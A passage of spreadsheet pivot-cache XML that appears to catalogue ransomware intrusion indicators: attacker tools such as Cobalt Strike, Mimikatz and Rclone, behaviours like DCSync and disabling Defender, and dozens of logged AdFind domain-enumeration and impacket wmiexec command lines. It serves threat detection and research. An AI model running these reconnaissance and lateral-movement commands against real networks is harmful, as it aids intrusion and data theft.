    <m/>
    <m/>
    <m/>
    <s v="Zeek DNS &amp; HTTP IOCs"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid0277"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="VBA Macro Conntects to HTTPs"/>
    <x v="32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32"/>
  </r>
  <r>
    <s v="ransom-eid0279"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="winlogon, svchost, rundll32, regsvr32, cmd"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid0280"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="RDP Scans "/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid0281"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scanned for SQL Servers 1443"/>
    <x v="32"/>
  </r>
  <r>
    <s v="ransom-eid0282"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0283"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0284"/>
    <m/>
    <m/>
    <s v="Mega"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0285"/>
    <m/>
    <s v="Defender Alerts EID 1117 for named pipes "/>
    <m/>
    <m/>
    <m/>
    <s v="Defender Alerts "/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0286"/>
    <m/>
    <s v="LSASS crash dump Werfault "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0287"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="rundll32, winlogon, svchost, LSASS"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0288"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winlogon DNS request "/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0289"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DCSYNC"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0290"/>
    <m/>
    <m/>
    <s v="AdGet"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0291"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\ProgramData\lsass.exe proxied RDP connections "/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0292"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0293"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Rundll32.exe process generated over 10K connections in a three hour window"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0294"/>
    <m/>
    <m/>
    <s v="Atera Agent"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0295"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <m/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0296"/>
    <m/>
    <s v="TA reste all user accounts on domain to same password via net "/>
    <m/>
    <m/>
    <m/>
    <s v="thousands of 4724"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ransom-eid0297"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="34"/>
  </r>
  <r>
    <s v="ransom-eid0298"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="34"/>
  </r>
  <r>
    <s v="ransom-eid0299"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="svchost, winlogon, taskhostw, dllhost. Runtimebroker"/>
    <x v="34"/>
  </r>
  <r>
    <s v="ransom-eid0300"/>
    <m/>
    <m/>
    <s v="PowerTool"/>
    <m/>
    <m/>
    <m/>
    <x v="34"/>
  </r>
  <r>
    <s v="ransom-eid0301"/>
    <m/>
    <m/>
    <s v="Rclone"/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0302"/>
    <m/>
    <s v="Process Injection"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <s v="svchost"/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0303"/>
    <m/>
    <s v="BITSAdmin"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0304"/>
    <m/>
    <m/>
    <s v="Bloodhound"/>
    <m/>
    <m/>
    <m/>
    <x v="35"/>
  </r>
  <r>
    <s v="ransom-eid0305"/>
    <m/>
    <s v="Created GPO to disable Windows Defender on all devices "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="35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6"/>
  </r>
  <r>
    <s v="ransom-eid0307"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="36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6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9"/>
  </r>
  <r>
    <s v="ransom-eid0020"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\system32\dllhost.exe"/>
    <m/>
    <s v="c:\Windows\system32\lsass.exe"/>
    <s v="0x1010"/>
    <m/>
    <m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167"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0168"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0169"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0170"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0171"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0172"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0173"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0174"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0277"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; &gt; ad_users.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0278"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; &gt; ad_ous.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0279"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp &gt; trustdmp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0280"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot; &gt; ad_group.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0281"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0282"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; &gt; ad_computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0283"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)&gt; subnets.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0334"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0335"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0336"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0337"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0338"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0339"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0340"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0360"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0361"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0362"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0363"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0364"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0365"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0366"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0413"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0414"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0415"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0416"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0417"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0418"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0419"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0533"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0534"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0535"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0536"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0537"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectcategory=subnet)  "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0538"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0539"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0569"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0570"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=computer)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0571"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0572"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0573"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -subnets -f &quot;(objectCategory=subnet)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0574"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="AdFind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0575"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0604"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0605"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0606"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0607"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0608"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0609"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe  -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0955"/>
    <s v="adfind-pid"/>
    <s v="Beacon"/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot; &gt; ad_ous.txt"/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0957"/>
    <s v="adfind-pid"/>
    <s v="Beacon"/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot; &gt; ad_computers.txt"/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0958"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=person&quot; &gt; ad_users.txt"/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0960"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -sc trustdmp &gt; trustdmp.txt"/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="8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8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8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8"/>
  </r>
  <r>
    <s v="ransom-eid1069"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -b dc=&lt;redact&gt;, dc=local -f &quot;objectcategory=computer&quot; &gt;&gt; computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1070"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f objectcategory = computer -csv name cn OperatingSystem dNSHostName&gt; some.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1071"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=person) -csv name cn title sAMAccountName &gt; u.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1072"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot; &gt; ad_users.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1093"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcatefory=group) -csv name cn description sAMAccountName &gt; adfind\g.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid1182"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=person) &gt;  ad_users.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1183"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f objectcategory=computer &gt; ad_computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1184"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=organizationalUnit) &gt; ad_ous.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1185"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet) &gt; ad_subnets.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1186"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot; &gt; ad_group.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1187"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp &gt;  ad_trustdmp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1189"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="del 7.exe adfind* ad_*"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid1238"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=person)"/>
    <s v="c:\windows\system32\cmd.exe, /c, adfind.bat"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1239"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=computer)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1240"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=organizationalUnit)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1241"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1242"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f  (objectcategory=group)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid1318"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=person) &gt; ad_users.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1319"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f objectcategory=computer &gt; ad_computers.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1320"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f objectcategory=computer -csv name operatingSystem &gt; ad_computers_enum.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1321"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f (objectcategory=organizationalUnit) &gt; ad_ous.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1322"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet) &gt; ad_subnets.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1323"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot; &gt; ad_group.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1324"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp &gt; ad_trustdmp.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid1377"/>
    <s v="adfind-pid"/>
    <m/>
    <s v="cmd.exe /C adfind.exe -f objectcategory=computer -csv name cn OperatingSystem dNSHostName &gt; some.csv"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13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14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14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14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14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14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14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14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14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14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14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14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14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5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5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5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5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5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5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5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5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5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5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5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5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16"/>
  </r>
  <r>
    <s v="ransom-eid0199"/>
    <s v="cmd-pid, impacket-pid"/>
    <s v="impacket wmiexec"/>
    <s v="1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="16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16"/>
  </r>
  <r>
    <s v="ransom-eid0768"/>
    <s v="cmd-pid, impacket-pid"/>
    <s v="impacket wmiexec"/>
    <s v="cmd.exe /q /c cd\ 1&gt; \\127.0.0.1\admin$\__1698618133[.]54 2&gt;&amp;1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="17"/>
  </r>
  <r>
    <s v="ransom-eid0770"/>
    <s v="cmd-pid, impacket-pid"/>
    <s v="impacket wmiexec"/>
